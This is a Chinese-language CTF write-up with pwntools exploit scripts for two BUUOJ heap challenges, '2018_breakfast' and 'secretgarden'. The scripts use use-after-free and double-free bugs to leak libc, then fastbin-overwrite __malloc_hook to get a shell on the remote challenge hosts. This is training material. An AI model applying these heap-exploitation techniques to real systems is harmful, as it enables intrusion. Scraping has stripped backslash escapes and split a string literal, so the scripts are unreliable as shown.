  • 寒假训练 fastbin attack刷题集

    铁人三项(第五赛区)_2018_breakfast

    有uaf,先overlap之后leak libc,再fast bin attack,自己审题没有认真(没必要overlap,由于write和read不是同一个指针,所以直接写got表内容即可完成)

    from pwn import *
    
    #p=process('./2018_breakfast')
    # Remote target for this challenge; the commented-out process() line above is the local variant.
    HOST, PORT = 'node3.buuoj.cn', 29005
    p = remote(HOST, PORT)
    # The libc build the leak offsets further down are computed against.
    libc = ELF('../libc-2.27.so')
    context.log_level = 'debug'
    def add(idx,size):
        """Menu option 1: create the breakfast in slot `idx` with `size` bytes.

        Each answer is sent with a trailing newline, in the order the menu asks.
        """
        dialogue = (
            ('5.- Exit', '1'),
            ('breakfast', str(idx)),
            ('kcal.', str(size)),
        )
        for prompt, reply in dialogue:
            p.recvuntil(prompt)
            p.sendline(reply)
    
    def edit(idx,content):
        """Menu option 2: overwrite the contents of slot `idx` with `content`.

        The slot index is answered with a newline; the payload itself is sent raw
        (no trailing newline), so callers control the exact bytes written.
        """
        dialogue = (
            ('5.- Exit', '2'),
            ('ingredients', str(idx)),
        )
        for prompt, reply in dialogue:
            p.recvuntil(prompt)
            p.sendline(reply)
        p.recvuntil('ingredients')
        p.send(content)
    
    def show(idx):
        """Menu option 3: ask the program to print slot `idx`.

        Only drives the menu; reading the printed data is left to the caller.
        """
        for prompt, reply in (('5.- Exit', '3'), ('see', str(idx))):
            p.recvuntil(prompt)
            p.sendline(reply)
    
    def delete(idx):
        """Menu option 4: free slot `idx`."""
        for prompt, reply in (('5.- Exit', '4'), ('delete', str(idx))):
            p.recvuntil(prompt)
            p.sendline(reply)
    
    # Stage 1, as described in the author's write-up: fill eleven 0x70-byte slots,
    # use the UAF (edit() is still usable on a slot after delete()) to overlap chunks,
    # then leak a libc pointer through show().
    add(0,0x70)#0
    add(1,0x70)
    add(2,0x70)
    add(3,0x70)
    add(4,0x70)
    add(5,0x70)
    add(6,0x70)
    add(7,0x70)
    add(8,0x70)
    add(9,0x70)
    add(10,0x70)
    # 0x10 bytes of filler, a zero word, then 0x81 written into slot 0; the author's
    # note says the overlap is built from this (and also that it was not actually needed).
    edit(0,b'p'*0x10+p64(0)+p64(0x81))
    
    delete(1)
    delete(0)
    
    # NOTE(review): 'x80' is presumably '\x80' -- the backslash looks stripped by the
    # page scraper. The same applies to 'x7f' and b'x00' on the libc.address line below;
    # confirm against the original post before reusing this script.
    edit(0,'x80')
    add(0,0x70)
    add(11,0x70)
    edit(11,b'p'*0x58+p64(0x481))
    delete(1)
    show(1)
    
    # Recover the libc base from the leaked pointer: keep the last 6 bytes of the output
    # up to the 0x7f byte, pad to 8, and subtract a fixed distance from __malloc_hook.
    # The constants (96 + 0x20) are specific to the libc-2.27.so loaded above.
    libc.address=u64(p.recvuntil('x7f')[-6:].ljust(8,b'x00'))-96-0x20-libc.symbols['__malloc_hook']
    print(hex(libc.address))
    # one_gadget candidate offsets for that same libc build; only the third is used.
    onegadget=[0x4f2c5,0x4f322,0x10a38c]
    one=libc.address+onegadget[2]
    malloc_hook=libc.symbols['__malloc_hook']
    
    # Stage 2, as described in the author's write-up: fast bin attack on __malloc_hook.
    add(4,0x68)
    add(5,0x68)
    delete(4)
    delete(5)
    
    edit(5,p64(malloc_hook-0x3))
    add(4,0x68)
    add(4,0x68)
    # Three bytes of padding (matching the -0x3 above) followed by the gadget address.
    edit(4,b'ppp'+p64(one))
    
    # Last allocation; with __malloc_hook overwritten above this is presumably what
    # hands control to the gadget.
    add(5,0x20)
    
    #gdb.attach(p)
    p.interactive()

    hitcontraining_secretgarden

    1. leak libc:malloc一个unsorted bin然后覆盖前8个字节,进行show
    2. getshell:fastbin attack,然后system即可
    from pwn import *
    #p=process('./secretgarden')
    # Remote target for this challenge; the commented-out process() line above is the local variant.
    HOST, PORT = 'node3.buuoj.cn', 25602
    p = remote(HOST, PORT)
    def add(size,name,content):
        """Menu option 1: plant a flower of `size` bytes with the given name and contents.

        Every answer is sent with a trailing newline, in the order the menu asks.
        """
        dialogue = (
            ('choice : ', '1'),
            ('name :', str(size)),
            ('flower :', name),
            ('flower :', content),
        )
        for prompt, reply in dialogue:
            p.recvuntil(prompt)
            p.sendline(reply)
    
    def delete(idx):
        """Menu option 3: remove flower `idx` from the garden."""
        for prompt, reply in (('choice :', '3'), ('garden:', str(idx))):
            p.recvuntil(prompt)
            p.sendline(reply)
    
    def show():
        """Menu option 2: list the garden; reading the output is left to the caller."""
        p.recvuntil('choice :')
        p.sendline('2')
    
    def clean():
        """Menu option 4: clean the garden. Defined for completeness; not used below."""
        p.recvuntil('choice :')
        p.sendline('4')
    
    # NOTE(review): `elf` is loaded but never referenced below.
    elf=ELF('./secretgarden')
    # The libc build the leak offsets further down are computed against.
    libc=ELF('../libc-2.23.so')
    
    # Step 1, as described in the author's note: allocate an unsorted-bin-sized chunk (0x90)
    # and a 0x68 one, free the first, reallocate a 0x68 and overwrite its first bytes,
    # then show() to leak a libc pointer.
    add(0x90,'pppp','pppp')
    add(0x68,'pppp','pppp')
    delete(0)
    # NOTE(review): 'x10' is presumably '\x10' -- the backslash looks stripped by the page
    # scraper. Same for 'x7f' and b'x00' on the libc.address line below; confirm against
    # the original post before reusing this script.
    add(0x68,'pppppppp','x10')
    show()
    
    # Recover the libc base from the leaked pointer: keep the last 6 bytes up to the 0x7f
    # byte, pad to 8, then subtract a fixed distance from __malloc_hook. The constants
    # (-0xa + 0x10) are specific to the libc-2.23.so loaded above.
    libc.address=u64(p.recvuntil('x7f')[-6:].ljust(8,b'x00'))-0xa+0x10-libc.symbols['__malloc_hook']
    print(hex(libc.address))
    # Step 2, as described in the author's note: fastbin attack.
    delete(1)
    delete(2)
    delete(1)
    
    # NOTE(review): `realloc` and `one_gadget` are assigned but never used; the value
    # actually written at the end is the hard-coded 0x400c5e, not one_gadget.
    realloc = libc.symbols['__libc_realloc']
    one_gadget = 0x4526a + libc.address
    malloc_hook=libc.symbols['__malloc_hook']
    add(0x68, p64(malloc_hook-0x23), p64(malloc_hook-0x23))
    
    add(0x68, p64(malloc_hook-0x23), p64(malloc_hook-0x23))
    add(0x68, p64(malloc_hook-0x23), p64(malloc_hook-0x23))
    
    # NOTE(review): the last argument is split across two lines by the page rendering --
    # presumably 'a\n' in the original. 0x400c5e is presumably an address inside
    # ./secretgarden (the "system" step the author's note refers to); if so, reading it
    # from `elf` would be less fragile than the literal.
    add(0x68,b'A'*0x13+p64(0x400c5e),'a
    ')
    p.interactive()
  • 原文地址:https://www.cnblogs.com/pppyyyzzz/p/14332559.html